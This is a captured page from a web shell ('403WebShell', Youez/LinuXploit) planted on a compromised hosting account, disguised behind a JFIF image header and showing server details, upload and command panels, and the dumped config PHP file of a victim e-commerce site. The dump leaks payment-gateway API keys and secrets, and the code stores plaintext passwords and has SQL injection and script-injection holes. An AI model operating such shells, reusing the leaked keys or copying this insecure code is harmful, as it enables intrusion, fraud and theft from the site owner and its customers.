���� JFIF    aewtgwgerwasdasd403WebShell
403Webshell
Server IP : 147.93.80.58  /  Your IP : 216.73.216.195
Web Server : LiteSpeed
System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User : u939086737 ( 939086737)
PHP Version : 8.2.28
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u939086737/domains/jeevikagaumaa.in/public_html/action/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/u939086737/domains/jeevikagaumaa.in/public_html/action/config(1).php
<?php
include 'db_connect.php';
mysqli_set_charset($con, "utf8mb4");
$page = ucfirst(pathinfo($_SERVER['PHP_SELF'], PATHINFO_FILENAME)); //Current file name without extension

$shop_q = mysqli_query($con, "SELECT * FROM `shop` WHERE status=1");
$shop = mysqli_fetch_assoc($shop_q);

$domain1 = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]"; //Get full domain name
function getDomain($url)
{
	$pieces = parse_url($url);
	$domain2 = isset($pieces['host']) ? $pieces['host'] : '';
	if (preg_match('/(?P<domain>[a-z0-9][a-z0-9\-]{1,63}\.[a-z\.]{2,6})$/i', $domain2, $regs)) {
		return $regs['domain'];
	}
	return FALSE;
}
$domain = getDomain($domain1);  // Get only domain name without wwww
$path2 = './assets/img/'; //this path is for admin side image operation
$path = './admin/assets/img/';	// this path is for user side fetch images

// Test Key
$keyId = 'rzp_test_EFJDmyX326UjBl';
$keySecret = 'YwqX5hVFr5IttFGx0dy8ljkB';

// Live Key
// $keyId = 'rzp_live_IMlBmajNHiDgl3';
// $keySecret = '6H7MOssAi8ZmhKYLkEQMZGdi';

// Fetch best deal products
$best_deal_products = [];
$deal_query = mysqli_query($con, "SELECT id, offer_price, deal_price, max_purchase_qty FROM `product` WHERE deal_price>0");
while ($row = mysqli_fetch_assoc($deal_query)) {
    $best_deal_products[$row['id']] = [
        'price' => $row['offer_price'],
		'deal_price' => $row['deal_price'],
        'max_purchase_qty' => $row['max_purchase_qty']
    ];
}

$product_details = [];
$product_query = mysqli_query($con, "SELECT id, qty2 FROM `product`");
while ($row = mysqli_fetch_assoc($product_query)) {
    $product_details[$row['id']] = [
        'qty2' => $row['qty2']
    ];
}

//=============================== User login ==============================================
if ($_SERVER["REQUEST_METHOD"] == "POST"  && isset($_POST['user_login'])) {
	// Get the form data
	$username = trim($_POST['username']);
	$password = trim($_POST['password']);

	$username = $con->real_escape_string($username);
	$password = $con->real_escape_string($password);

	// Query the database to check for the user
	$sql = "SELECT * FROM users WHERE (email = '$username' OR phone = '$username' OR userid = '$username') AND password = '$password' AND status = 1";
	$result = $con->query($sql);

	if ($result->num_rows == 1) {
		// User exists, start the session
		$user = $result->fetch_assoc();
		$_SESSION['userid'] = $user['userid'];
		$_SESSION['name'] = $user['name'];

		if(isset($_GET['returnpath'])){
			echo '<script>window.location.href="'.$_GET['returnpath'].'"; </script>';
		}else{
			echo '<script>window.location.href="my-account"; </script>';
		}
		exit;
	} else {
		$error_message = "Invalid username or password.";
	}
}

//========================= User Register ===============================================
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['user_register'])) {
	// Sanitize and validate the input
	$sponsorid = trim($_POST['sponsorid']);
	$name = trim($_POST['name']);
	$phone = trim($_POST['phone']);
	$email = trim($_POST['email']);
	$password = trim($_POST['password']);
	$date = date('d-m-Y H:i:s');
	$userid = 'JD' . rand(100000, 999999);
	$orderId = $_POST['order_id'];
	$amount = 1100;

	// Insert the new user into the database
	$query = "INSERT INTO users (userid, sponcerid, name, phone, email, password, join_date) VALUES (?, ?, ?, ?, ?, ?, ?)";
	$stmt = $con->prepare($query);
	$stmt->bind_param("sssssss", $userid, $sponsorid, $name, $phone, $email, $password, $date);

	if ($stmt->execute()) { ?>
		<style>
			.warning-message {
				position: fixed;
				top: 10px;
				/* Adjust this value to control the vertical position */
				left: 50%;
				transform: translateX(-50%);
				background-color: yellow;
				/* Background color for visibility */
				color: red;
				/* Text color */
				padding: 10px 20px;
				border: 2px solid red;
				border-radius: 5px;
				font-size: 16px;
				font-weight: bold;
				z-index: 1000;
				/* Ensure it is on top of other elements */
			}

			.warning-message a {
				color: blue;
				/* Color for the link */
				text-decoration: underline;
				/* Underline the link */
				margin-left: 10px;
				/* Space between the message and the link */
			}
		</style>
		<div class="warning-message">
			Please do not press the back or refresh button.
			If the page is not working, <a href="./">GO TO HOME</a>
		</div>


		<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
		<script src="https://checkout.razorpay.com/v1/checkout.js"></script>
		<script>
			$(document).ready(function() {
				var options = {
					"key": "<?= $keyId; ?>", // Enter the Key ID generated from the Dashboard
					"amount": "<?= $amount * 100; ?>", // Amount in paise
					"currency": "INR",
					"name": "<?= $shop['name'] ?>",
					"description": "Registration Fee",
					"image": "https://jeevandayinijeevikagausewasadan.in/img/favicon.png",
					"order_id": "<?= $orderId; ?>",
					"handler": function(response) {
						// Redirect to a thank you page with payment details
						window.location.href = 'register-success?payment_id=' + response.razorpay_payment_id + '&order_id=' + response.razorpay_order_id + '&signature=' + response.razorpay_signature + '&userid=<?= $userid ?>';
					},
					"prefill": {
						"name": "<?= $name; ?>",
						"email": "<?= $email; ?>",
						"contact": "<?= $phone; ?>"
					},
					"theme": {
						"color": "#a81c19"
					}
				};
				var rzp1 = new Razorpay(options);
				rzp1.open();
			});
		</script>
		<?php
	} else {
		$_SESSION['error'] = "Registration failed. Please try again.";
		header("Location: signup");
		exit;
	}
	$stmt->close();
}

//======================= Use Wallet Balance===============================
if (isset($_POST["use_wallet"])) {
	$total_wallet_bal = $_POST['total_wallet_bal'];
	$max_use_wallet_bal = $_POST['max_use_wallet_bal'];
	$wallet_bal1 = $_POST['use_bal'];
	$date = date('d-m-Y');
	if ($wallet_bal1 > $total_wallet_bal || $wallet_bal1 > $max_use_wallet_bal) {
		echo '<script>alert("Invalid Amount"); </script> ';
		return false;
	} else {
		$_SESSION['wallet_bal'] = $wallet_bal1;
		echo '<script>alert("Wallet Balance Applied Successfully."); window.location.href=""; </script>';
	}
}

//=========================== Email Subscription ==============================
if (isset($_POST["email_subscribe"])) {
	$email = $_POST['email'];
	$date = date('Y-m-d');

	$q1 = mysqli_query($con, "SELECT * FROM `subscription` WHERE email='$email'");
	if (mysqli_num_rows($q1) > 0) {
		echo ' <script>alert("Thanks To Resubscribe Our Newsletter");</script> ';
	} else {
		mysqli_query($con, "INSERT INTO `subscription`(`email`, `date`) VALUES ('$email','$date')");
		echo ' <script>alert("Thanks to subscribe our newsletter");</script> ';
	}
}

//========================Add New Address==========================================
if (isset($_POST['add_new_address'])) {
	$name = mysqli_real_escape_string($con, $_POST['name']);
	$address = mysqli_real_escape_string($con, $_POST['address']);
	$landmark = mysqli_real_escape_string($con, $_POST['landmark']);
	$city = mysqli_real_escape_string($con, $_POST['city']);
	$state = mysqli_real_escape_string($con, $_POST['state']);
	$pin = mysqli_real_escape_string($con, $_POST['pin']);
	$phone = mysqli_real_escape_string($con, $_POST['phone']);

	mysqli_query($con, "INSERT INTO `user_address`(`userid`, `name`, `phone`, `address`, `landmark`, `city`, `state`, `pin`) VALUES ('$_SESSION[userid]', '$name', '$phone', '$address', '$landmark', '$city', '$state', '$pin')");

	echo ' <script>alert("New Address Addedd Successfully !"); window.location.href="";</script> ';
}

//=========================Update Address======================================
if (isset($_POST['update_address'])) {
	$name = mysqli_real_escape_string($con, $_POST['name']);
	$address = mysqli_real_escape_string($con, $_POST['address']);
	$landmark = mysqli_real_escape_string($con, $_POST['landmark']);
	$city = mysqli_real_escape_string($con, $_POST['city']);
	$state = mysqli_real_escape_string($con, $_POST['state']);
	$pin = mysqli_real_escape_string($con, $_POST['pin']);
	$phone = mysqli_real_escape_string($con, $_POST['phone']);
	$id = $_POST['id'];

	mysqli_query($con, "UPDATE `user_address` SET `name`='$name', `phone`='$phone', `address`='$address', `landmark`='$landmark', `city`='$city', `state`='$state', `pin`='$pin' WHERE id='$id' ");

	echo ' <script>window.location.href="my-account";</script> ';
}


//=========================Update Profile======================================
if (isset($_POST['profile_update'])) {
	$name = mysqli_real_escape_string($con, $_POST['name']);
	$email = mysqli_real_escape_string($con, $_POST['email']);
	$old_pass = mysqli_real_escape_string($con, $_POST['old_pass']);
	$new_pass = mysqli_real_escape_string($con, $_POST['new_pass']);
	$cnew_pass = mysqli_real_escape_string($con, $_POST['cnew_pass']);
	$old_password = mysqli_real_escape_string($con, $_POST['old_password']);
	$userid = $_SESSION['userid'];

	mysqli_query($con, "UPDATE `users` SET `name`='$name', `email`='$email' WHERE userid='$userid' ");

	if ($old_pass && $new_pass && $cnew_pass) {
		if ($old_pass == $old_password) {
			if ($new_pass == $cnew_pass) {
				mysqli_query($con, "UPDATE `users` SET `password`='$new_pass' WHERE userid='$userid' AND password='$old_pass' ");
				echo ' <script>alert("Password Changed !"); window.location.href="";</script> ';
			} else {
				echo ' <script>alert("Password does not matched !"); window.location.href="";</script> ';
			}
		} else {
			echo '<script>alert("Old Password is wrong !"); window.location.href="";</script> ';
		}
	}
}

//========================Contact page msg==========================================
if (isset($_POST['send_msg'])) {
	$name = mysqli_real_escape_string($con, $_POST['name']);
	$email = mysqli_real_escape_string($con, $_POST['email']);
	$subject = mysqli_real_escape_string($con, $_POST['subject']);
	$message = mysqli_real_escape_string($con, $_POST['message']);
	$phone = mysqli_real_escape_string($con, $_POST['phone']);
	$date = date('d-m-Y');

	mysqli_query($con, "INSERT INTO `feedback`(`name`, `email`, `phone`, `subject`, `mes`, `date`) VALUES ('$name', '$email', '$phone', '$subject', '$message', '$date')");

	echo ' <script>alert("Message Sent Successfully !"); window.location.href="";</script> ';
}

//=====================Product Search Bar ======================================
if (isset($_GET['search_p'])) {
	$search = mysqli_real_escape_string($con, $_GET['search']);
	echo ' <script>window.location.href="shop?p=1&search=' . $search . '";</script> ';
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit